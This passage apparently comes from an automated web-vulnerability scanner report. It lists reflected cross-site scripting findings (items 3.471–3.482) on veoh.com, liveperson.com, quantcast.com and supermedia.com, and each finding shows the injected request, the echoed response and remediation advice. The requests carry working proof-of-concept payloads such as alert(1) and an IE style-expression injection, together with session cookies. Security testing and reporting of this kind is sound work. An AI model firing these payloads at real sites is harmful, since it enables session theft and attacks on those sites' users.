<form id="flagVideoForm" method="post" action="/video/submitflag/permalinkId/v18978294NGnK88j81a041"style="x:expression(alert(1))"ad20725130b" name="flagVideoForm" onsubmit="return verifyFlag(this);">
...[SNIP]...

3.471. http://www.veoh.com/video/share/permalinkId/v18978294NGnK88j8 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /video/share/permalinkId/v18978294NGnK88j8

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42a1c"style%3d"x%3aexpression(alert(1))"80e77e495a9 was submitted in the REST URL parameter 4. This input was echoed as 42a1c"style="x:expression(alert(1))"80e77e495a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /video/share/permalinkId/v18978294NGnK88j842a1c"style%3d"x%3aexpression(alert(1))"80e77e495a9 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:22 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=63
Content-Length: 30205

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<input type="text" onclick="this.select();" value="http://www.veoh.com/browse/videos/category//watch/v18978294NGnK88j842a1c"style="x:expression(alert(1))"80e77e495a9" readonly="true" />
...[SNIP]...

3.472. http://solutions.liveperson.com/ref/lppb.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://solutions.liveperson.com
Path:   /ref/lppb.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d839'-alert(1)-'88ff7fe44ab was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=8d839'-alert(1)-'88ff7fe44ab

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 17:52:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 3686
Content-Type: text/html
Set-Cookie: visitor=ref=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3D8d839%27%2Dalert%281%29%2D%2788ff7fe44ab; expires=Tue, 10-Jan-2012 05:00:00 GMT; domain=.liveperson.com; path=/
Set-Cookie: ASPSESSIONIDQSDTDCQS=IKKOGOICDOJPFCIEFKNGGLFL; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<TITLE>Customer Service Solutions - LivePerson</title>
<META NAME="descripti
...[SNIP]...
<script language='javascript'>
   lpAddVars('visitor','Visitor+Referrer','http://www.google.com/search?hl=en&q=8d839'-alert(1)-'88ff7fe44ab');
   lpAddVars('page','pageName','');
</script>
...[SNIP]...

3.473. http://www.quantcast.com/p-aasG6JkxVvmNA [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.quantcast.com
Path:   /p-aasG6JkxVvmNA

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff882"><script>alert(1)</script>9cbb95e5ed5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /p-aasG6JkxVvmNA HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ff882"><script>alert(1)</script>9cbb95e5ed5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Thu, 03 Feb 2011 22:03:05 GMT
Expires: Wed, 02 Feb 2011 10:03:06 GMT
Cache-control: private, max-age=0
Set-Cookie: qcVisitor=0|82|1296770586032|0|NOTSET; Expires=Sat, 26-Jan-2041 22:03:06 GMT; Path=/
Set-Cookie: JSESSIONID=44D9028629FFF99EE86CE90A605E6EC0; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/
...[SNIP]...
<a id="homeFootContactUs" href="http://www.bing.com/search?q=ff882"><script>alert(1)</script>9cbb95e5ed5+-quantcast" rel="nofollow">
...[SNIP]...

3.474. http://www.supermedia.com/community/blog [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /community/blog

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48f6c"-alert(1)-"c33954f4f7b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /community/blog HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;
Referer: http://www.google.com/search?hl=en&q=48f6c"-alert(1)-"c33954f4f7b

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:27:36 GMT
Content-Type: text/html;charset=UTF-8
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=48f6c"-alert(1)-"c33954f4f7b";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

3.475. http://www.supermedia.com/crossdomain.xml [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /crossdomain.xml

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a79f"-alert(1)-"94d6ddab3a8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /crossdomain.xml HTTP/1.1
Host: www.supermedia.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=3a79f"-alert(1)-"94d6ddab3a8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296763571|check#true#1296761771; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:46:53 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20791


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=3a79f"-alert(1)-"94d6ddab3a8";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

3.476. http://www.supermedia.com/spportal/404.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /spportal/404.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52554"-alert(1)-"ef1396cf41e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/404.jsp HTTP/1.1
Host: www.supermedia.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=52554"-alert(1)-"ef1396cf41e
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296762103|check#true#1296760303; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:20:10 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20791


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=52554"-alert(1)-"ef1396cf41e";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

3.477. http://www.supermedia.com/spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8c66"-alert(1)-"92f4c806eeb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif HTTP/1.1
Host: www.supermedia.com
Proxy-Connection: keep-alive
Referer: d8c66"-alert(1)-"92f4c806eeb
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D; mbox=session#1296759528614-838261#1296762103|check#true#1296760303

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:20:45 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20754


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="d8c66"-alert(1)-"92f4c806eeb";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

3.478. http://www.supermedia.com/support/help/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /support/help/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13f3c"-alert(1)-"f8f23428e65 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/help/ HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;
Referer: 13f3c"-alert(1)-"f8f23428e65

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:22:54 GMT
Content-Type: text/html;charset=UTF-8
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="13f3c"-alert(1)-"f8f23428e65";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

3.479. http://www.supermedia.com/yellow-pages/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /yellow-pages/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1d1e"-alert(1)-"7bc6b80740c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /yellow-pages/ HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;
Referer: e1d1e"-alert(1)-"7bc6b80740c

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:23:19 GMT
Content-Type: text/html;charset=UTF-8
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="e1d1e"-alert(1)-"7bc6b80740c";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

3.480. https://www.supermedia.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d0f4"-alert(1)-"3372c90867f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=8d0f4"-alert(1)-"3372c90867f
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761715|check#true#1296759915; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:11:10 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 30942


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Small Business Marketing and Internet Advertising | SuperMedia.com</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=8d0f4"-alert(1)-"3372c90867f";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

3.481. https://www.supermedia.com/signin [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /signin

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 327fc"-alert(1)-"221a82e08e1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /signin HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296763571|check#true#1296761771; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
Referer: http://www.google.com/search?hl=en&q=327fc"-alert(1)-"221a82e08e1

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:48:57 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 24711


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=327fc"-alert(1)-"221a82e08e1";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

3.482. https://www.supermedia.com/spportal/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ba03"-alert(1)-"bdea14bb63f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/ HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
